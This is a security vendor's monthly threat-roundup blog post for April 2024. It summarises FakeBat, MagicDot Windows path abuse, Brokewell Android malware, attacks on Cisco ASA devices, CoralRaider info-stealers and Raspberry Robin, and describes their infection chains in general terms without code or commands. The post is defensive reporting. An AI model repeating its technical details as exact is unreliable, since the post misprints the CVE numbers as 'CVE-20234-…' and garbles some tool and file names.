X
NEXT
Forgot password?

DigitalXRAID

Threat Pulse – April 2024

Each month, DigitalXRAID’s Security Operations Centre (SOC) analysts share the top threats affecting businesses globally. Take action to protect your organisation against these prolific threats. 

If you’ve been affected by any of these threats, we’re here to help. You can call our Cyber Emergency line any time of the day or night for help with active cyberattacks.

DigitalXRAID’s SOC analysts constantly monitor for zero-day threats and update our signature databases using the largest Open Threat Exchange database available. 

FakeBat Malware Distributing via Fake Browser Updates 

A recent malware campaign has been uncovered, leveraging fake browser update notifications to distribute the FakeBat loader.  

The campaign employs sophisticated social engineering techniques, with malicious JavaScript code injected into compromised websites to trigger deceptive update prompts. These prompts mimic legitimate browser updates, personalised to match the user’s browser type and language settings, ultimately serving a malicious MSIX payload signed with a previously used ConsoneAI signature.  

The attack uses a multi-stage infection chain, server-side logic controlling malicious page exposure, and the use of Pastebin links hosting anti-analysis techniques. 

Researchers Uncover Windows Flaws Granting Hackers Rootkit-Like Powers 

New research highlights that the DOS-to-NT conversion process could be exploited by threat actors to gain rootkit-like capabilities to conceal and impersonate files, directories, and processes.  

SafeBreach researcher Or Yair revealed at Black Hat Asia that during this conversion, a known issue exists where trailing dots and spaces are removed from paths, enabling what are called MagicDot paths.  

These paths allow unprivileged users to carry out malicious actions without admin permissions, such as hiding files and processes, affecting file analysis, and more. Additionally, this issue has led to the discovery of security vulnerabilities, three of which have been addressed by Microsoft, including an elevation of privilege deletion and write vulnerabilities, a remote code execution vulnerability, and a denial-of-service vulnerability impacting Process Explorer. 

New ‘Brokewell’ Android Malware Spread Through Fake Browser Updates 

Fake browser updates are being used to push a previously undocumented Android malware called Brokewell that can capture every event on the device, from touches and information displayed, to text input and the applications the user launches. Brokewell is under active development and features a mix of extensive device takeover and remote control capabilities. 

The malware can bypass the restrictions Google introduced in Android 13 and later to prevent abuse of the Accessibility Service for side-loaded apps (APKs), however Google has confirmed that Google Play Protect automatically protects users against known versions of this malware, so it is recommended to have Play Protect enabled.  

State-Sponsored Espionage Campaign against Cisco ASA vulnerabilities 

A state-sponsored threat actor named ‘UT4356’ has launched a sophisticated cyberattack against Cisco Adaptive Security Appliances using vulnerabilities first discovered in January 2024.  

The threat actors deployed backdoor components named Line Runner and Line Dancer. Line Runner serves as a persistent HTTP-based Lua implant on Cisco ASA, while Line Dancer allows for the upload and execution of arbitrary shell-code payloads. The vulnerabilities being targeted were the Denial-of-Service exploit: CVE-20234-20353, and the local code execution exploit: CVE-20234-20359. 

CoralRaider Threat Actor uses CDN cache to push out info-stealer malware 

A new malicious campaign by the group CoralRaiders has been uncovered, that aims to spread the info-stealers Cryptbot, Rhadamanthys, and LummaC2 using a multi-stage infection chain attack. 

The attack is run using a malicious Windows ShortCut file (.LNK) spread through phishing emails. The LNK file contains PowerShell code that locates and executes mshsta.exe to run an HTLM application file stored on the attacker’s CDN domain. This triggers a loader to drop and execute two bash scripts, one that adds “ProgramData” to defender exclusion, and another that starts the information stealer. 

Windows Script Files Exploited in Latest Raspberry Robin Malware Attack 

Cybersecurity researchers have uncovered a new wave of the Raspberry Robin malware campaign, previously known for spreading through USB drives, now employing malicious Windows Script Files (WSFs). Raspberry Robin has evolved into a downloader for various payloads including SocGholish, Cobalt Strike, and ransomware. 

DigitalXRAID exists to ensure that the bad guys don’t win. We’re driven and motivated to protect customers. Our expertise and unrivalled service means we can take care of your security, whilst you take care of business.    

Talk to the team to see how you can start protecting your business against cyberattacks today. 

Previous Article

Regulatory Compliance & Cybersecurity in Critical Infrastructure

Next Article

LockBit is dead – long live LockBit?

Cyber Security Experts

Accredited and regulated, we're in the top 1% of cyber security agencies globally

Crown Commercial Service Supplier Cyber Essentials Plus ISO 27001 BSI ISO 9001 CHECK NCSC Cyber Incident Response CREST

We’re trusted by the UK Government as Crown Commercial Service providers as well as being accredited by two of the leading cyber security governing bodies. Our ISO9001 certification means you can rest assured our processes and approach are market leading.

Protect Your Business & Your Reputation.

With a continued focus on security, you can rest assured that breaches and exploits won't be holding you back.

Speak To An Expert

x

Get In Touch

[contact-form-7 id="5" title="Contact Us Form"]